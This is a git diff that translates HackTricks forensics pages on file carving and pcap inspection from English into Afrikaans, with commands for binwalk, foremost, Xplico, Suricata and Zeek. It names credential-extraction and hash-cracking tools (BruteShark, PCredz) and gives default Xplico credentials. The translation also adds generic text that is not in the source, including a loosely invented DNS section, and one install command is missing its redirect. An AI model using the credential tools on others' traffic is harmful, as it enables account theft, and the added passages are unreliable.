- - diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md index 54fc4a1be..d8b9468ef 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md @@ -1,105 +1,93 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Carving tools +# Uitsnygereedskap ## Autopsy -The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kind of images, but not simple files. +Die mees algemene gereedskap wat in forensika gebruik word om lêers uit beelde te onttrek, is [**Autopsy**](https://www.autopsy.com/download/). Laai dit af, installeer dit en laat dit die lêer inneem om "verborge" lêers te vind. Let daarop dat Autopsy gebou is om skyfbeelds en ander soorte beelde te ondersteun, maar nie eenvoudige lêers nie. ## Binwalk -**Binwalk** is a tool for searching binary files like images and audio files for embedded files and data. -It can be installed with `apt` however the [source](https://github.com/ReFirmLabs/binwalk) can be found on github. -**Useful commands**: - +**Binwalk** is 'n gereedskap om binêre lêers soos beelde en klanklêers te soek vir ingebedde lêers en data. +Dit kan geïnstalleer word met `apt`, maar die [bron](https://github.com/ReFirmLabs/binwalk) kan op GitHub gevind word. +**Nuttige opdragte**: ```bash sudo apt install binwalk #Insllation binwalk file #Displays the embedded data in the given file binwalk -e file #Displays and extracts some files from the given file binwalk --dd ".*" file #Displays and extracts all files from the given file ``` - ## Foremost -Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for it's default configured file types. - +'n Ander algemene instrument om verskuilde lêers te vind is **foremost**. Jy kan die opsetlêer van foremost in `/etc/foremost.conf` vind. As jy net wil soek na sekere spesifieke lêers, verwyder die kommentaarmerke. As jy niks verwyder nie, sal foremost soek na sy verstek geconfigureerde lêertipes. ```bash sudo apt-get install foremost foremost -v -i file.img -o output #Discovered files will appear inside the folder "output" ``` - ## **Scalpel** -**Scalpel** is another tool that can be use to find and extract **files embedded in a file**. In this case you will need to uncomment from the configuration file \(_/etc/scalpel/scalpel.conf_\) the file types you want it to extract. - +**Scalpel** is nog 'n instrument wat gebruik kan word om **lêers wat in 'n lêer ingebed is** te vind en te onttrek. In hierdie geval moet jy die lêertipes wat jy wil onttrek, ontkommentarieer uit die konfigurasie-lêer (_/etc/scalpel/scalpel.conf_). ```bash sudo apt-get install scalpel scalpel file.img -o output ``` - ## Bulk Extractor -This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor) - -This tool can scan an image and will **extract pcaps** inside it, **network information\(URLs, domains, IPs, MACs, mails\)** and more **files**. You only have to do: +Hierdie instrument kom binne kali, maar jy kan dit hier vind: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor) +Hierdie instrument kan 'n beeld skandeer en sal **pcaps onttrek** binne dit, **netwerkinligting\(URL's, domeine, IP's, MAC's, e-posse\)** en meer **lêers**. Jy hoef net die volgende te doen: ```text bulk_extractor memory.img -o out_folder ``` - -Navigate through **all the information** that the tool has gathered \(passwords?\), **analyse** the **packets** \(read[ **Pcaps analysis**](../pcap-inspection/)\), search for **weird domains** \(domains related to **malware** or **non-existent**\). +Navigeer deur **alle inligting** wat die instrument ingesamel het \(wagwoorde?\), **analiseer** die **pakkies** \(lees [**Pcaps-analise**](../pcap-inspection/)\), soek na **vreemde domeine** \(domeine wat verband hou met **kwaadwillige sagteware** of **nie-bestaande**\). ## PhotoRec -You can find it in [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) +Jy kan dit vind by [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) -It comes with GUI and CLI version. You can select the **file-types** you want PhotoRec to search for. +Dit kom met 'n GUI- en CLI-weergawe. Jy kan die **lêertipes** kies wat PhotoRec moet soek. ![](../../../.gitbook/assets/image%20%28524%29.png) -# Specific Data Carving Tools +# Spesifieke Data Carving-instrumente ## FindAES -Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker. +Soek na AES-sleutels deur te soek na hul sleutelskedules. In staat om 128, 192 en 256 bit sleutels te vind, soos dié wat deur TrueCrypt en BitLocker gebruik word. -Download [here](https://sourceforge.net/projects/findaes/). +Laai [hier af](https://sourceforge.net/projects/findaes/). -# Complementary tools +# Aanvullende instrumente -You can use [**viu** ](https://github.com/atanunq/viu)to see images form the terminal. -You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. +Jy kan [**viu** ](https://github.com/atanunq/viu)gebruik om beelde vanuit die terminaal te sien. +Jy kan die Linux-opdraglyn-instrument **pdftotext** gebruik om 'n pdf in te omskep na teks en dit te lees.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md index 8500de6fe..767fcf125 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -1,158 +1,189 @@ -# Pcap Inspection +# Pcap Inspeksie
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %} {% hint style="info" %} -A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools. +'n Nota oor **PCAP** vs **PCAPNG**: daar is twee weergawes van die PCAP-lêerformaat; **PCAPNG is nuwer en nie deur alle gereedskap ondersteun nie**. Jy mag 'n lêer van PCAPNG na PCAP moet omskakel deur Wireshark of 'n ander kompatibele gereedskap te gebruik, om daarmee te werk in ander gereedskap. {% endhint %} -## Online tools for pcaps +## Aanlyn gereedskap vir pcaps -* If the header of your pcap is **broken** you should try to **fix** it using: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) -* Extract **information** and search for **malware** inside a pcap in [**PacketTotal**](https://packettotal.com) -* Search for **malicious activity** using [**www.virustotal.com**](https://www.virustotal.com) and [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) +* As die kop van jou pcap **beskadig** is, moet jy probeer om dit te **herstel** deur gebruik te maak van: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) +* Onttrek **inligting** en soek na **kwaadwillige sagteware** binne 'n pcap in [**PacketTotal**](https://packettotal.com) +* Soek na **skadelike aktiwiteit** deur gebruik te maak van [**www.virustotal.com**](https://www.virustotal.com) en [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) -## Extract Information +## Onttrek Inligting -The following tools are useful to extract statistics, files, etc. +Die volgende gereedskap is nuttig om statistieke, lêers, ens. te onttrek. ### Wireshark {% hint style="info" %} -**If you are going to analyze a PCAP you basically must to know how to use Wireshark** +**As jy 'n PCAP gaan analiseer, moet jy basies weet hoe om Wireshark te gebruik** {% endhint %} -You can find some Wireshark tricks in: +Jy kan 'n paar Wireshark-truuks vind in: {% content-ref url="wireshark-tricks.md" %} [wireshark-tricks.md](wireshark-tricks.md) {% endcontent-ref %} -### Xplico Framework +### Xplico-raamwerk -[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico, extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. - -**Install** +[**Xplico** ](https://github.com/xplico/xplico)_(slegs Linux)_ kan 'n **pcap** analiseer en inligting daaruit onttrek. Byvoorbeeld, van 'n pcap-lêer onttrek Xplico elke e-pos (POP, IMAP en SMTP-protokolle), alle HTTP-inhoud, elke VoIP-oproep (SIP), FTP, TFTP, en so aan. +**Installeer** ```bash sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list' sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE sudo apt-get update sudo apt-get install xplico ``` - -**Run** - +**Voer uit** ``` /etc/init.d/apache2 restart /etc/init.d/xplico start ``` +Kry toegang tot _**127.0.0.1:9876**_ met geloofsbriewe _**xplico:xplico**_ -Access to _**127.0.0.1:9876**_ with credentials _**xplico:xplico**_ - -Then create a **new case**, create a **new session** inside the case and **upload the pcap** file. +Skep dan 'n **nuwe saak**, skep 'n **nuwe sessie** binne die saak en **laai die pcap-lêer op**. ### NetworkMiner -Like Xplico it is a tool to **analyze and extract objects from pcaps**. It has a free edition that you can **download** [**here**](https://www.netresec.com/?page=NetworkMiner). It works with **Windows**.\ -This tool is also useful to get **other information analysed** from the packets in order to be able to know what was happening in a **quicker** way. +Soos Xplico is dit 'n instrument om **analiseer en voorwerpe uit pcaps te onttrek**. Dit het 'n gratis uitgawe wat jy kan **aflaai** [**hier**](https://www.netresec.com/?page=NetworkMiner). Dit werk met **Windows**.\ +Hierdie instrument is ook nuttig om **ander inligting geanaliseer** uit die pakkies te kry om te kan weet wat in 'n **vinniger** manier gebeur het. ### NetWitness Investigator -You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\ -This is another useful tool that **analyses the packets** and sorts the information in a useful way to **know what is happening inside**. +Jy kan [**NetWitness Investigator hier aflaai**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(Dit werk in Windows)**.\ +Dit is 'n ander nuttige instrument wat die pakkies **analiseer** en die inligting op 'n nuttige manier **sorteer om te weet wat binne gebeur**. ### [BruteShark](https://github.com/odedshimon/BruteShark) -* Extracting and encoding usernames and passwords (HTTP, FTP, Telnet, IMAP, SMTP...) -* Extract authentication hashes and crack them using Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) -* Build a visual network diagram (Network nodes & users) -* Extract DNS queries -* Reconstruct all TCP & UDP Sessions -* File Carving +* Uitpak en enkode gebruikersname en wagwoorde (HTTP, FTP, Telnet, IMAP, SMTP...) +* Onttrek verifikasiehasings en kraak hulle met behulp van Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) +* Bou 'n visuele netwerkdiagram (Netwerknodes & gebruikers) +* Onttrek DNS-navrae +* Herkonstrueer alle TCP- en UDP-sessies +* Lêer uitsnyding ### Capinfos - ``` capinfos capture.pcap ``` - ### Ngrep -If you are **looking** for **something** inside the pcap you can use **ngrep**. Here is an example using the main filters: +As jy **iets** binne die pcap soek, kan jy **ngrep** gebruik. Hier is 'n voorbeeld wat die hooffilters gebruik: +```bash +ngrep -I file.pcap 'filter' +``` + +Die `-I` vlag dui aan dat die bron 'n lêer is, en `file.pcap` is die naam van die pcap-lêer wat jy wil ondersoek. Die `'filter'` argument is die soekfilter wat jy wil gebruik om spesifieke data te vind binne die pcap-lêer. + +Hier is 'n paar voorbeelde van ngrep-filters wat jy kan gebruik: + +- `tcp` - Soek na TCP-verbindings. +- `udp` - Soek na UDP-verbindings. +- `port 80` - Soek na verbindings op poort 80. +- `host 192.168.1.1` - Soek na verbindings na die IP-adres 192.168.1.1. +- `src host 192.168.1.1` - Soek na verbindings waarvan die bron-IP-adres 192.168.1.1 is. +- `dst host 192.168.1.1` - Soek na verbindings waarvan die bestemmings-IP-adres 192.168.1.1 is. + +Jy kan ook meer komplekse filters gebruik deur logiese operatore soos `and`, `or` en `not` te gebruik. Byvoorbeeld: + +- `tcp and port 80` - Soek na TCP-verbindings op poort 80. +- `udp or port 53` - Soek na UDP-verbindings of verbindings op poort 53. +- `not host 192.168.1.1` - Soek na verbindings wat nie na die IP-adres 192.168.1.1 gaan nie. + +Met ngrep kan jy spesifieke data binne die pcap-lêer vind deur die filters te gebruik wat die beste by jou ondersoek pas. ```bash ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168" ``` +### Uithol -### Carving - -Using common carving techniques can be useful to extract files and information from the pcap: +Die gebruik van algemene uitholtegnieke kan nuttig wees om lêers en inligting uit die pcap te onttrek: {% content-ref url="../partitions-file-systems-carving/file-data-carving-recovery-tools.md" %} [file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md) {% endcontent-ref %} -### Capturing credentials +### Vang van geloofsbriewe -You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface. +Jy kan gereedskap soos [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) gebruik om geloofsbriewe uit 'n pcap of 'n lewendige koppelvlak te ontled.
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante sibersekuriteitsgebeurtenis in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitsprofessionals in elke dissipline. {% embed url="https://www.rootedcon.com/" %} -## Check Exploits/Malware +## Kontroleer Uitbuitings/Malware ### Suricata -**Install and setup** - +**Installeer en stel op** ``` apt-get install suricata apt-get install oinkmaster echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules ``` +**Kyk na pcap** -**Check pcap** +Om 'n pcap-lêer te ondersoek, kan jy die volgende stappe volg: +1. **Identifiseer die doel van die ondersoek**: Bepaal wat jy probeer vind of bewys in die pcap-lêer. + +2. **Installeer 'n pcap-analisehulpmiddel**: Gebruik 'n geskikte hulpmiddel soos Wireshark om die pcap-lêer te ontleed en te ondersoek. + +3. **Analiseer die netwerkverkeer**: Bestudeer die verskillende netwerkverbindings en -protokolle in die pcap-lêer. Identifiseer verdagte aktiwiteite, ongewone patrone of enige ander potensiële aanwysers van 'n aanval. + +4. **Identifiseer die bronne en bestemmings**: Kyk na die bron- en bestemmings-IP-adresse en -poorte om te bepaal watter entiteite betrokke is by die kommunikasie. Identifiseer enige onbekende of verdagte bronne of bestemmings. + +5. **Ondersoek die inhoud van die kommunikasie**: Ontleed die inhoud van die kommunikasie in die pcap-lêer. Kyk na die datastrome, HTTP-aanvrae, e-posse, enige gevoelige inligting of enige ander relevante inligting wat kan help om die aard van die aanval of die kommunikasie te bepaal. + +6. **Volg die tydlyn**: Analiseer die tydlyn van die netwerkverkeer om die volgorde van gebeure te bepaal en om te sien of daar enige tydgebaseerde patrone of verdagte aktiwiteite is. + +7. **Identifiseer enige verdagte aktiwiteite**: Let op enige verdagte aktiwiteite, soos ongewone poorte, onbekende protokolle, ongewone datastrome, onverwagte kommunikasiepatrone, of enige ander afwykings van normale netwerkgedrag. + +8. **Verkry aanvullende inligting**: Indien nodig, gebruik ander tegnieke soos DNS-navrae, WHOIS-opsoek, IP-adresopsporing, of enige ander relevante inligting om verdere konteks te verkry oor die bronne of bestemmings in die pcap-lêer. + +9. **Stel 'n verslag op**: Maak 'n gedetailleerde verslag van jou bevindinge, insluitend enige verdagte aktiwiteite, potensiële aanwysers van 'n aanval, en enige ander relevante inligting. ``` suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log ``` - ### YaraPcap -[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that +[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is 'n instrument wat -* Reads a PCAP File and Extracts Http Streams. -* gzip deflates any compressed streams -* Scans every file with yara -* Writes a report.txt -* Optionally saves matching files to a Dir +* 'n PCAP-lêer lees en HTTP-strome onttrek. +* gzip defleer enige gekomprimeerde strome +* Skandeer elke lêer met yara +* Skryf 'n report.txt +* Opsioneel stoor ooreenstemmende lêers in 'n gids -### Malware Analysis +### Malware-analise -Check if you can find any fingerprint of a known malware: +Kyk of jy enige vingerafdruk van 'n bekende malware kan vind: {% content-ref url="../malware-analysis.md" %} [malware-analysis.md](../malware-analysis.md) @@ -160,12 +191,11 @@ Check if you can find any fingerprint of a known malware: ## Zeek -> [Zeek](https://docs.zeek.org/en/master/about.html) is a passive, open-source network traffic analyzer. Many operators use Zeek as a Network Security Monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting. +> [Zeek](https://docs.zeek.org/en/master/about.html) is 'n passiewe, oopbron-netwerkverkeerontleder. Baie operateurs gebruik Zeek as 'n Netwerksekuriteitsmonitor (NSM) om ondersoeke na verdagte of skadelike aktiwiteit te ondersteun. Zeek ondersteun ook 'n wye reeks verkeersontledingsopdragte buite die sekuriteitsdomein, insluitend prestasiemeting en foutopsporing. -Basically, logs created by `zeek` aren't **pcaps**. Therefore you will need to use **other tools** to analyse the logs where the **information** about the pcaps are. - -### Connections Info +Basies is logboeke wat deur `zeek` geskep word nie **pcaps** nie. Jy sal dus **ander instrumente** moet gebruik om die logboeke waar die **inligting** oor die pcaps is, te analiseer. +### Verbindingsinligting ```bash #Get info about longest connections (add "grep udp" to see only udp traffic) #The longest connection might be of malware (constant reverse shell?) @@ -215,9 +245,35 @@ Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top 1,10.55.100.111,165.227.216.194,20054,92,29,52,1,52,7774,20053,0,0,0,0 0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0 ``` +### DNS-inligting -### DNS info +DNS (Domain Name System) is 'n protokol wat gebruik word om IP-adresse aan domeinname te koppel. Dit vertaal mensverstaanbare domeinname na numeriese IP-adresse wat deur rekenaars gebruik word om met mekaar te kommunikeer. +DNS-inligting kan waardevol wees vir forensiese ondersoeke, omdat dit kan help om die aktiwiteite van 'n gebruiker of 'n aanvaller te identifiseer. Deur 'n PCAP (Packet Capture) te ondersoek, kan jy DNS-verkeer analiseer en inligting verkry soos die IP-adresse van besoekte webwerwe, DNS-navrae en DNS-antwoorde. + +Hier is 'n paar nuttige DNS-inligting wat jy uit 'n PCAP kan ontleed: + +#### DNS-navrae + +DNS-navrae is versoek wat deur 'n rekenaar gestuur word om die IP-adres van 'n spesifieke domeinnaam te bekom. Dit kan aandui watter webwerwe of dienste besoek is. + +#### DNS-antwoorde + +DNS-antwoorde is die reaksies wat deur DNS-bedieners gestuur word om die IP-adres van 'n gevraagde domeinnaam te verskaf. Dit kan aandui watter IP-adresse besoek is en of daar enige ongewone of verdagte aktiwiteite plaasgevind het. + +#### DNS-tydskrifte + +DNS-tydskrifte is 'n log van DNS-navrae en -antwoorde wat deur 'n rekenaar gestuur en ontvang is. Dit kan gebruik word om die volledige DNS-geskiedenis van 'n rekenaar te ontleed en te analiseer. + +#### DNS-gebruikers + +DNS-gebruikers is die rekenaars of toestelle wat DNS-navrae en -antwoorde genereer. Deur die identifisering van hierdie gebruikers kan jy die bron van 'n spesifieke DNS-verkeer bepaal. + +#### DNS-tydskrif-analise + +DNS-tydskrif-analise behels die ontleed van DNS-tydskrifte om inligting te verkry oor die aktiwiteite van 'n rekenaar of netwerk. Dit kan help om verdagte aktiwiteite, soos die besoek van skadelike webwerwe of die kommunikasie met verdagte IP-adresse, te identifiseer. + +Deur die inspeksie van DNS-inligting in 'n PCAP, kan jy waardevolle insigte verkry oor die aktiwiteite van 'n rekenaar of netwerk en dit gebruik vir forensiese analise. ```bash #Get info about each DNS request performed cat dns.log | zeek-cut -c id.orig_h query qtype_name answers @@ -234,8 +290,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr #See top DNS domain requested with rita rita show-exploded-dns -H --limit 10 zeek_logs ``` - -## Other pcap analysis tricks +## Ander pcap-analise-truuks {% content-ref url="dnscat-exfiltration.md" %} [dnscat-exfiltration.md](dnscat-exfiltration.md) @@ -253,20 +308,20 @@ rita show-exploded-dns -H --limit 10 zeek_logs
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md index ca2eda85f..e644197e8 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md @@ -1,65 +1,57 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling 